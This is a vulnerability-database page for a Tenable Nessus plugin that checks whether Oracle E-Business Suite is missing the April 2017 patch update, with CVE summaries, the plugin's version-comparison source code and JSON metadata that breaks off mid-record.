Search...

Oracle E-Business Multiple Vulnerabilities (April 2017 CPU)

2017-04-19T00:00:00

ID ORACLE_E-BUSINESS_CPU_APR_2017.NASL
Type nessus
Reporter This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
Modified 2021-03-02T00:00:00

Description

The version of Oracle E-Business installed on the remote host is missing the April 2017 Oracle Critical Patch Update (CPU). It is, therefore, affected by the following vulnerabilities :

An unspecified flaw exists in the Oracle Marketing component within the User Interface subcomponent that allows an unauthenticated, remote attacker to impact confidentiality and integrity. This vulnerability only affects versions 12.1.1 through 12.1.3 and versions 12.2.3 through 12.2.6. (CVE-2017-3337)

An unspecified flaw exists in the Oracle Advanced Outbound Telephony component within the Interaction History subcomponent that allows an unauthenticated, remote attacker to impact confidentiality and integrity. This vulnerability only affects versions 12.2.3 through 12.2.6. (CVE-2017-3393)

An unspecified flaw exists in the Oracle One-to-One Fulfillment component within the Audience Workbench subcomponent that allows an unauthenticated, remote attacker to impact confidentiality and integrity. This vulnerability only affects versions 12.1.1 through 12.1.3. (CVE-2017-3432)

An unspecified flaw exists in the Oracle User Management component within the User Name/Password Management subcomponent that allows an unauthenticated, remote attacker to impact confidentiality and integrity. This vulnerability only affects version 12.1.3 and versions 12.2.3 through 12.2.6. (CVE-2017-3515)

An unspecified flaw exists in the Oracle Applications Framework component within the Popup windows lists subcomponent that allows an unauthenticated, remote attacker to impact confidentiality and integrity. This vulnerability only affects version 12.1.3 and versions 12.2.3 through 12.2.6. (CVE-2017-3528)

An unspecified flaw exists in the Oracle Scripting component within the Scripting Administration subcomponent that allows an unauthenticated, remote attacker to impact confidentiality and integrity. This vulnerability only affects versions 12.1.1 through 12.1.3 and versions 12.2.3 through 12.2.6. (CVE-2017-3549)

An unspecified flaw exists in the Oracle Customer Interaction History component within the Admin Console subcomponent that allows an unauthenticated, remote attacker to impact confidentiality and integrity. This vulnerability only affects versions 12.1.1 through 12.1.3. (CVE-2017-3550)

An unspecified flaw exists in the Oracle iReceivables component within the Self Registration subcomponent that allows an unauthenticated, remote attacker to cause a denial of service condition. This vulnerability only affects versions 12.1.1 through 12.1.3 and versions 12.2.3 through 12.2.6. (CVE-2017-3555)

An unspecified flaw exists in the Oracle Application Object Library component within the File Management subcomponent that allows an unauthenticated, remote attacker to disclose potentially sensitive information. This vulnerability only affects version 12.1.3 and versions 12.2.3 through 12.2.6. (CVE-2017-3556)

An unspecified flaw exists in the Oracle One-to-One Fulfillment component within the Print Server subcomponent that allows an unauthenticated, remote attacker to impact confidentiality and integrity. This vulnerability only affects version 12.1.3 and versions 12.2.3 through 12.2.6. (CVE-2017-3557)

An unspecified flaw exists in the Oracle Payables component within the Self Service Manager subcomponent that allows an authenticated, remote attacker to impact confidentiality and integrity. This vulnerability only affects versions 12.1.1 through 12.1.3 and versions 12.2.3 through 12.2.6. (CVE-2017-3592)

                                        
                                            #
# (C) Tenable Network Security, Inc.
#

include("compat.inc");

if (description)
{
  script_id(99479);
  script_version("1.7");
  script_cvs_date("Date: 2019/11/13");

  script_cve_id(
    "CVE-2017-3337",
    "CVE-2017-3393",
    "CVE-2017-3432",
    "CVE-2017-3515",
    "CVE-2017-3528",
    "CVE-2017-3549",
    "CVE-2017-3550",
    "CVE-2017-3555",
    "CVE-2017-3556",
    "CVE-2017-3557",
    "CVE-2017-3592"
  );
  script_bugtraq_id(
    97748,
    97757,
    97761,
    97764,
    97767,
    97770,
    97773,
    97777,
    97780,
    97783,
    97785
  );

  script_name(english:"Oracle E-Business Multiple Vulnerabilities (April 2017 CPU)");
  script_summary(english:"Checks for the April 2017 CPU.");

  script_set_attribute(attribute:"synopsis", value:
"A web application installed on the remote host is affected by multiple
vulnerabilities.");
  script_set_attribute(attribute:"description", value:
"The version of Oracle E-Business installed on the remote host is
missing the April 2017 Oracle Critical Patch Update (CPU). It is,
therefore, affected by the following vulnerabilities :

  - An unspecified flaw exists in the Oracle Marketing
    component within the User Interface subcomponent that
    allows an unauthenticated, remote attacker to impact
    confidentiality and integrity. This vulnerability only
    affects versions 12.1.1 through 12.1.3 and versions
    12.2.3 through 12.2.6. (CVE-2017-3337)

  - An unspecified flaw exists in the Oracle Advanced
    Outbound Telephony component within the Interaction
    History subcomponent that allows an unauthenticated,
    remote attacker to impact confidentiality and integrity.
    This vulnerability only affects versions 12.2.3 through
    12.2.6. (CVE-2017-3393)

  - An unspecified flaw exists in the Oracle One-to-One
    Fulfillment component within the Audience Workbench
    subcomponent that allows an unauthenticated, remote
    attacker to impact confidentiality and integrity. This
    vulnerability only affects versions 12.1.1 through
    12.1.3. (CVE-2017-3432)

  - An unspecified flaw exists in the Oracle User Management
    component within the User Name/Password Management
    subcomponent that allows an unauthenticated, remote
    attacker to impact confidentiality and integrity. This
    vulnerability only affects version 12.1.3 and versions
    12.2.3 through 12.2.6. (CVE-2017-3515)

  - An unspecified flaw exists in the Oracle Applications
    Framework component within the Popup windows lists
    subcomponent that allows an unauthenticated, remote
    attacker to impact confidentiality and integrity. This
    vulnerability only affects version 12.1.3 and versions
    12.2.3 through 12.2.6. (CVE-2017-3528)

  - An unspecified flaw exists in the Oracle Scripting
    component within the Scripting Administration
    subcomponent that allows an unauthenticated, remote
    attacker to impact confidentiality and integrity. This
    vulnerability only affects versions 12.1.1 through
    12.1.3 and versions 12.2.3 through 12.2.6.
    (CVE-2017-3549)

  - An unspecified flaw exists in the Oracle Customer
    Interaction History component within the Admin Console
    subcomponent that allows an unauthenticated, remote
    attacker to impact confidentiality and integrity. This
    vulnerability only affects versions 12.1.1 through
    12.1.3. (CVE-2017-3550)

  - An unspecified flaw exists in the Oracle iReceivables
    component within the Self Registration subcomponent
    that allows an unauthenticated, remote attacker to cause
    a denial of service condition. This vulnerability only
    affects versions 12.1.1 through 12.1.3 and versions
    12.2.3 through 12.2.6. (CVE-2017-3555)

  - An unspecified flaw exists in the Oracle Application
    Object Library component within the File Management
    subcomponent that allows an unauthenticated, remote
    attacker to disclose potentially sensitive information.
    This vulnerability only affects version 12.1.3 and
    versions 12.2.3 through 12.2.6. (CVE-2017-3556)

  - An unspecified flaw exists in the Oracle One-to-One
    Fulfillment component within the Print Server
    subcomponent that allows an unauthenticated, remote
    attacker to impact confidentiality and integrity. This
    vulnerability only affects version 12.1.3 and versions
    12.2.3 through 12.2.6. (CVE-2017-3557)

  - An unspecified flaw exists in the Oracle Payables
    component within the Self Service Manager subcomponent
    that allows an authenticated, remote attacker to impact
    confidentiality and integrity. This vulnerability only
    affects versions 12.1.1 through 12.1.3 and versions
    12.2.3 through 12.2.6. (CVE-2017-3592)");
  # https://www.oracle.com/technetwork/security-advisory/cpuapr2017-3236618.html#AppendixEBS
  script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?620f75f9");
  script_set_attribute(attribute:"solution", value:
"Apply the appropriate patch according to the April 2017 Oracle
Critical Patch Update advisory.");
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:S/C:C/I:C/A:N");
  script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
  script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:N");
  script_set_cvss3_temporal_vector("CVSS:3.0/E:P/RL:O/RC:C");
  script_set_attribute(attribute:"cvss_score_source", value:"CVE-2017-3592");

  script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"true");

  script_set_attribute(attribute:"vuln_publication_date", value:"2017/04/18");
  script_set_attribute(attribute:"patch_publication_date", value:"2017/04/18");
  script_set_attribute(attribute:"plugin_publication_date", value:"2017/04/19");

  script_set_attribute(attribute:"plugin_type", value:"local");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:oracle:e-business_suite");
  script_end_attributes();

  script_category(ACT_GATHER_INFO);
  script_family(english:"Misc.");

  script_copyright(english:"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.");

  script_dependencies("oracle_e-business_query_patch_info.nbin");
  script_require_keys("Oracle/E-Business/Version", "Oracle/E-Business/patches/installed");

  exit(0);
}

include("audit.inc");
include("global_settings.inc");
include("misc_func.inc");

version = get_kb_item_or_exit("Oracle/E-Business/Version");
patches = get_kb_item_or_exit("Oracle/E-Business/patches/installed");

# Batch checks
if (patches) patches = split(patches, sep:',', keep:FALSE);
else patches = make_list();

p12_1 = '25449171';
p12_2 = '25449173';

# Check if the installed version is an affected version
affected_versions = make_array(
  '12.1.1', make_list(p12_1),
  '12.1.2', make_list(p12_1),
  '12.1.3', make_list(p12_1),

  '12.2.3', make_list(p12_2),
  '12.2.4', make_list(p12_2),
  '12.2.5', make_list(p12_2),
  '12.2.6', make_list(p12_2)
);

patched = FALSE;
affectedver = FALSE;

if (affected_versions[version])
{
  affectedver = TRUE;
  patchids = affected_versions[version];
  foreach required_patch (patchids)
  {
    foreach applied_patch (patches)
    {
      if(required_patch == applied_patch)
      {
        patched = applied_patch;
        break;
      }
    }
    if(patched) break;
  }
  if(!patched) patchreport = join(patchids,sep:" or ");
}

if (!patched && affectedver)
{
  if(report_verbosity &gt; 0)
  {
    report =
      '\n  Installed version : '+version+
      '\n  Fixed version     : '+version+' Patch '+patchreport+
      '\n';
    security_hole(port:0,extra:report);
  }
  else security_hole(0);
  exit(0);
}
else if (!affectedver) audit(AUDIT_INST_VER_NOT_VULN, 'Oracle E-Business', version);
else exit(0, 'The Oracle E-Business server ' + version + ' is not affected because patch ' + patched + ' has been applied.');

JSON Vulners Source

Initial Source

{"id": "ORACLE_E-BUSINESS_CPU_APR_2017.NASL", "bulletinFamily": "scanner", "title": "Oracle E-Business Multiple Vulnerabilities (April 2017 CPU)", "description": "The version of Oracle E-Business installed on the remote host is\nmissing the April 2017 Oracle Critical Patch Update (CPU). It is,\ntherefore, affected by the following vulnerabilities :\n\n - An unspecified flaw exists in the Oracle Marketing\n component within the User Interface subcomponent that\n allows an unauthenticated, remote attacker to impact\n confidentiality and integrity. This vulnerability only\n affects versions 12.1.1 through 12.1.3 and versions\n 12.2.3 through 12.2.6. (CVE-2017-3337)\n\n - An unspecified flaw exists in the Oracle Advanced\n Outbound Telephony component within the Interaction\n History subcomponent that allows an unauthenticated,\n remote attacker to impact confidentiality and integrity.\n This vulnerability only affects versions 12.2.3 through\n 12.2.6. (CVE-2017-3393)\n\n - An unspecified flaw exists in the Oracle One-to-One\n Fulfillment component within the Audience Workbench\n subcomponent that allows an unauthenticated, remote\n attacker to impact confidentiality and integrity. This\n vulnerability only affects versions 12.1.1 through\n 12.1.3. (CVE-2017-3432)\n\n - An unspecified flaw exists in the Oracle User Management\n component within the User Name/Password Management\n subcomponent that allows an unauthenticated, remote\n attacker to impact confidentiality and integrity. This\n vulnerability only affects version 12.1.3 and versions\n 12.2.3 through 12.2.6. (CVE-2017-3515)\n\n - An unspecified flaw exists in the Oracle Applications\n Framework component within the Popup windows lists\n subcomponent that allows an unauthenticated, remote\n attacker to impact confidentiality and integrity. This\n vulnerability only affects version 12.1.3 and versions\n 12.2.3 through 12.2.6. (CVE-2017-3528)\n\n - An unspecified flaw exists in the Oracle Scripting\n component within the Scripting Administration\n subcomponent that allows an unauthenticated, remote\n attacker to impact confidentiality and integrity. This\n vulnerability only affects versions 12.1.1 through\n 12.1.3 and versions 12.2.3 through 12.2.6.\n (CVE-2017-3549)\n\n - An unspecified flaw exists in the Oracle Customer\n Interaction History component within the Admin Console\n subcomponent that allows an unauthenticated, remote\n attacker to impact confidentiality and integrity. This\n vulnerability only affects versions 12.1.1 through\n 12.1.3. (CVE-2017-3550)\n\n - An unspecified flaw exists in the Oracle iReceivables\n component within the Self Registration subcomponent\n that allows an unauthenticated, remote attacker to cause\n a denial of service condition. This vulnerability only\n affects versions 12.1.1 through 12.1.3 and versions\n 12.2.3 through 12.2.6. (CVE-2017-3555)\n\n - An unspecified flaw exists in the Oracle Application\n Object Library component within the File Management\n subcomponent that allows an unauthenticated, remote\n attacker to disclose potentially sensitive information.\n This vulnerability only affects version 12.1.3 and\n versions 12.2.3 through 12.2.6. (CVE-2017-3556)\n\n - An unspecified flaw exists in the Oracle One-to-One\n Fulfillment component within the Print Server\n subcomponent that allows an unauthenticated, remote\n attacker to impact confidentiality and integrity. This\n vulnerability only affects version 12.1.3 and versions\n 12.2.3 through 12.2.6. (CVE-2017-3557)\n\n - An unspecified flaw exists in the Oracle Payables\n component within the Self Service Manager subcomponent\n that allows an authenticated, remote attacker to impact\n confidentiality and integrity. This vulnerability only\n affects versions 12.1.1 through 12.1.3 and versions\n 12.2.3 through 12.2.6. (CVE-2017-3592)", "published": "2017-04-19T00:00:00", "modified": "2021-03-02T00:00:00", "cvss": {"score": 8.5, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:N"}, "href": "https://www.tenable.com/plugins/nessus/99479", "reporter": "This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["http://www.nessus.org/u?620f75f9"], "cvelist": ["CVE-2017-3556", "CVE-2017-3549", "CVE-2017-3337", "CVE-2017-3432", "CVE-2017-3528", "CVE-2017-3592", "CVE-2017-3515", "CVE-2017-3393", "CVE-2017-3555", "CVE-2017-3557", "CVE-2017-3550"], "type": "nessus", "lastseen": "2021-03-01T04:57:02", "edition": 31, "viewCount": 50, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-3550", "CVE-2017-3549", "CVE-2017-3556", "CVE-2017-3393", "CVE-2017-3337", "CVE-2017-3432", "CVE-2017-3515", "CVE-2017-3528", "CVE-2017-3592", "CVE-2017-3557"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:145904", "PACKETSTORM:142243"]}, {"type": "zdt", "idList": ["1337DAY-ID-27641", "1337DAY-ID-29501", "1337DAY-ID-27670"]}, {"type": "exploitdb", "idList": ["EDB-ID:41926", "EDB-ID:43592"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:3910B3FDDB0AB5130FF0A186BC43CAAD"]}, {"type": "erpscan", "idList": ["ERPSCAN-17-026", "ERPSCAN-17-025", "ERPSCAN-17-021", "ERPSCAN-17-024"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310811016"]}, {"type": "oracle", "idList": ["ORACLE:CPUAPR2017", "ORACLE:CPUAPR2017-3236618"]}], "modified": "2021-03-01T04:57:02", "rev": 2}, "score": {"value": 7.1, "vector": "NONE", "modified": "2021-03-01T04:57:02", "rev": 2}, "vulnersScore": 7.1}, "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(99479);\n script_version(\"1.7\");\n script_cvs_date(\"Date: 2019/11/13\");\n\n script_cve_id(\n \"CVE-2017-3337\",\n \"CVE-2017-3393\",\n \"CVE-2017-3432\",\n \"CVE-2017-3515\",\n \"CVE-2017-3528\",\n \"CVE-2017-3549\",\n \"CVE-2017-3550\",\n \"CVE-2017-3555\",\n \"CVE-2017-3556\",\n \"CVE-2017-3557\",\n \"CVE-2017-3592\"\n );\n script_bugtraq_id(\n 97748,\n 97757,\n 97761,\n 97764,\n 97767,\n 97770,\n 97773,\n 97777,\n 97780,\n 97783,\n 97785\n );\n\n script_name(english:\"Oracle E-Business Multiple Vulnerabilities (April 2017 CPU)\");\n script_summary(english:\"Checks for the April 2017 CPU.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A web application installed on the remote host is affected by multiple\nvulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Oracle E-Business installed on the remote host is\nmissing the April 2017 Oracle Critical Patch Update (CPU). It is,\ntherefore, affected by the following vulnerabilities :\n\n - An unspecified flaw exists in the Oracle Marketing\n component within the User Interface subcomponent that\n allows an unauthenticated, remote attacker to impact\n confidentiality and integrity. This vulnerability only\n affects versions 12.1.1 through 12.1.3 and versions\n 12.2.3 through 12.2.6. (CVE-2017-3337)\n\n - An unspecified flaw exists in the Oracle Advanced\n Outbound Telephony component within the Interaction\n History subcomponent that allows an unauthenticated,\n remote attacker to impact confidentiality and integrity.\n This vulnerability only affects versions 12.2.3 through\n 12.2.6. (CVE-2017-3393)\n\n - An unspecified flaw exists in the Oracle One-to-One\n Fulfillment component within the Audience Workbench\n subcomponent that allows an unauthenticated, remote\n attacker to impact confidentiality and integrity. This\n vulnerability only affects versions 12.1.1 through\n 12.1.3. (CVE-2017-3432)\n\n - An unspecified flaw exists in the Oracle User Management\n component within the User Name/Password Management\n subcomponent that allows an unauthenticated, remote\n attacker to impact confidentiality and integrity. This\n vulnerability only affects version 12.1.3 and versions\n 12.2.3 through 12.2.6. (CVE-2017-3515)\n\n - An unspecified flaw exists in the Oracle Applications\n Framework component within the Popup windows lists\n subcomponent that allows an unauthenticated, remote\n attacker to impact confidentiality and integrity. This\n vulnerability only affects version 12.1.3 and versions\n 12.2.3 through 12.2.6. (CVE-2017-3528)\n\n - An unspecified flaw exists in the Oracle Scripting\n component within the Scripting Administration\n subcomponent that allows an unauthenticated, remote\n attacker to impact confidentiality and integrity. This\n vulnerability only affects versions 12.1.1 through\n 12.1.3 and versions 12.2.3 through 12.2.6.\n (CVE-2017-3549)\n\n - An unspecified flaw exists in the Oracle Customer\n Interaction History component within the Admin Console\n subcomponent that allows an unauthenticated, remote\n attacker to impact confidentiality and integrity. This\n vulnerability only affects versions 12.1.1 through\n 12.1.3. (CVE-2017-3550)\n\n - An unspecified flaw exists in the Oracle iReceivables\n component within the Self Registration subcomponent\n that allows an unauthenticated, remote attacker to cause\n a denial of service condition. This vulnerability only\n affects versions 12.1.1 through 12.1.3 and versions\n 12.2.3 through 12.2.6. (CVE-2017-3555)\n\n - An unspecified flaw exists in the Oracle Application\n Object Library component within the File Management\n subcomponent that allows an unauthenticated, remote\n attacker to disclose potentially sensitive information.\n This vulnerability only affects version 12.1.3 and\n versions 12.2.3 through 12.2.6. (CVE-2017-3556)\n\n - An unspecified flaw exists in the Oracle One-to-One\n Fulfillment component within the Print Server\n subcomponent that allows an unauthenticated, remote\n attacker to impact confidentiality and integrity. This\n vulnerability only affects version 12.1.3 and versions\n 12.2.3 through 12.2.6. (CVE-2017-3557)\n\n - An unspecified flaw exists in the Oracle Payables\n component within the Self Service Manager subcomponent\n that allows an authenticated, remote attacker to impact\n confidentiality and integrity. This vulnerability only\n affects versions 12.1.1 through 12.1.3 and versions\n 12.2.3 through 12.2.6. (CVE-2017-3592)\");\n # https://www.oracle.com/technetwork/security-advisory/cpuapr2017-3236618.html#AppendixEBS\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?620f75f9\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the appropriate patch according to the April 2017 Oracle\nCritical Patch Update advisory.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:C/I:C/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-3592\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/04/18\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/04/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/04/19\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:oracle:e-business_suite\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"oracle_e-business_query_patch_info.nbin\");\n script_require_keys(\"Oracle/E-Business/Version\", \"Oracle/E-Business/patches/installed\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nversion = get_kb_item_or_exit(\"Oracle/E-Business/Version\");\npatches = get_kb_item_or_exit(\"Oracle/E-Business/patches/installed\");\n\n# Batch checks\nif (patches) patches = split(patches, sep:',', keep:FALSE);\nelse patches = make_list();\n\np12_1 = '25449171';\np12_2 = '25449173';\n\n# Check if the installed version is an affected version\naffected_versions = make_array(\n '12.1.1', make_list(p12_1),\n '12.1.2', make_list(p12_1),\n '12.1.3', make_list(p12_1),\n\n '12.2.3', make_list(p12_2),\n '12.2.4', make_list(p12_2),\n '12.2.5', make_list(p12_2),\n '12.2.6', make_list(p12_2)\n);\n\npatched = FALSE;\naffectedver = FALSE;\n\nif (affected_versions[version])\n{\n affectedver = TRUE;\n patchids = affected_versions[version];\n foreach required_patch (patchids)\n {\n foreach applied_patch (patches)\n {\n if(required_patch == applied_patch)\n {\n patched = applied_patch;\n break;\n }\n }\n if(patched) break;\n }\n if(!patched) patchreport = join(patchids,sep:\" or \");\n}\n\nif (!patched && affectedver)\n{\n if(report_verbosity > 0)\n {\n report =\n '\\n Installed version : '+version+\n '\\n Fixed version : '+version+' Patch '+patchreport+\n '\\n';\n security_hole(port:0,extra:report);\n }\n else security_hole(0);\n exit(0);\n}\nelse if (!affectedver) audit(AUDIT_INST_VER_NOT_VULN, 'Oracle E-Business', version);\nelse exit(0, 'The Oracle E-Business server ' + version + ' is not affected because patch ' + patched + ' has been applied.');\n", "naslFamily": "Misc.", "pluginID": "99479", "cpe": ["cpe:/a:oracle:e-business_suite"], "scheme": null, "cvss3": {"score": 6.5, "vector": "AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:N"}}

{"cve": [{"lastseen": "2021-02-02T06:36:44", "description": "Vulnerability in the Oracle Payables component of Oracle E-Business Suite (subcomponent: Self Service Manager). Supported versions that are affected are 12.1.1, 12.1.2, 12.1.3, 12.2.3, 12.2.4, 12.2.5 and 12.2.6. Easily \"exploitable\" vulnerability allows high privileged attacker with network access via HTTP to compromise Oracle Payables. Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Oracle Payables accessible data as well as unauthorized access to critical data or complete access to all Oracle Payables accessible data. CVSS 3.0 Base Score 6.5 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:N).", "edition": 5, "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "baseScore": 6.5, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:N", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.2}, "published": "2017-04-24T19:59:00", "title": "CVE-2017-3592", "type": "cve", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "NONE", "integrityImpact": "COMPLETE", "baseScore": 8.5, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 9.2, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-3592"], "modified": "2019-10-03T00:03:00", "cpe": ["cpe:/a:oracle:payroll:12.2.4", "cpe:/a:oracle:payroll:12.1.2", "cpe:/a:oracle:payroll:12.2.3", "cpe:/a:oracle:payroll:12.1.1", "cpe:/a:oracle:payroll:12.1.3", "cpe:/a:oracle:payroll:12.2.5", "cpe:/a:oracle:payroll:12.2.6"], "id": "CVE-2017-3592", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-3592", "cvss": {"score": 8.5, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:N"}, "cpe23": ["cpe:2.3:a:oracle:payroll:12.2.3:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:payroll:12.2.5:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:payroll:12.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:payroll:12.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:payroll:12.2.4:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:payroll:12.2.6:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:payroll:12.1.1:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T06:36:44", "description": "Vulnerability in the Oracle Marketing component of Oracle E-Business Suite (subcomponent: User Interface). Supported versions that are affected are 12.1.1, 12.1.2, 12.1.3, 12.2.3, 12.2.4, 12.2.5 and 12.2.6. Easily \"exploitable\" vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Marketing. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle Marketing, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle Marketing accessible data as well as unauthorized update, insert or delete access to some of Oracle Marketing accessible data. CVSS 3.0 Base Score 8.2 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N).", "edition": 5, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "baseScore": 7.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:H/A:N", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 4.2}, "published": "2017-04-24T19:59:00", "title": "CVE-2017-3337", "type": "cve", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "COMPLETE", "baseScore": 7.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:C/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 7.8, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-3337"], "modified": "2019-10-03T00:03:00", "cpe": ["cpe:/a:oracle:marketing:12.1.1", "cpe:/a:oracle:marketing:12.2.4", "cpe:/a:oracle:marketing:12.1.3", "cpe:/a:oracle:marketing:12.2.5", "cpe:/a:oracle:marketing:12.2.6", "cpe:/a:oracle:marketing:12.2.3", "cpe:/a:oracle:marketing:12.1.2"], "id": "CVE-2017-3337", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-3337", "cvss": {"score": 7.8, "vector": "AV:N/AC:M/Au:N/C:P/I:C/A:N"}, "cpe23": ["cpe:2.3:a:oracle:marketing:12.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:marketing:12.2.3:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:marketing:12.2.6:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:marketing:12.2.5:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:marketing:12.2.4:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:marketing:12.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:marketing:12.1.1:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T06:36:44", "description": "Vulnerability in the Oracle Advanced Outbound Telephony component of Oracle E-Business Suite (subcomponent: Interaction History). Supported versions that are affected are 12.2.3, 12.2.4, 12.2.5 and 12.2.6. Easily \"exploitable\" vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Advanced Outbound Telephony. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle Advanced Outbound Telephony, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle Advanced Outbound Telephony accessible data as well as unauthorized update, insert or delete access to some of Oracle Advanced Outbound Telephony accessible data. CVSS 3.0 Base Score 8.2 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N).", "edition": 5, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "baseScore": 7.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:H/A:N", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 4.2}, "published": "2017-04-24T19:59:00", "title": "CVE-2017-3393", "type": "cve", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "COMPLETE", "baseScore": 7.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:C/A:N", "version": 